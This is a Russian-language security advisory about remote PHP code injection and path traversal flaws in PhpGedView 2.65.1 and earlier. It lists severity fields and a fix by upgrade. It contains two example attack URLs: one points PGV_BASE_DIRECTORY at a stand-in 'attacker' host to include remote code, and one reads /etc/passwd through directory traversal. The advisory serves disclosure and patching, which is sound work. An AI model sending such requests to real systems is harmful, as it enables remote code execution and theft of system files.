Дата публикации: | 01.02.2004 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1074 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | PhpGedView 2.x |
Уязвимые версии: PhpGedView 2.65.1 и более ранние версии
Описание: Несколько уязвимостей обнаружено в PhpGedView. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целеовой системы. Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе. Несколько сценариев (заканчивающихся '_conf.php') не проверяют данные, представленные пользователем в переменной $PGV_BASE_DIRECTORY. Пример: http://[target]/[phpGedView-directory ]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе. Пример: http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd URL производителя: http://phpgedview.sourceforge.net/ Решение:Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517 |
|
Ссылки: | PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior |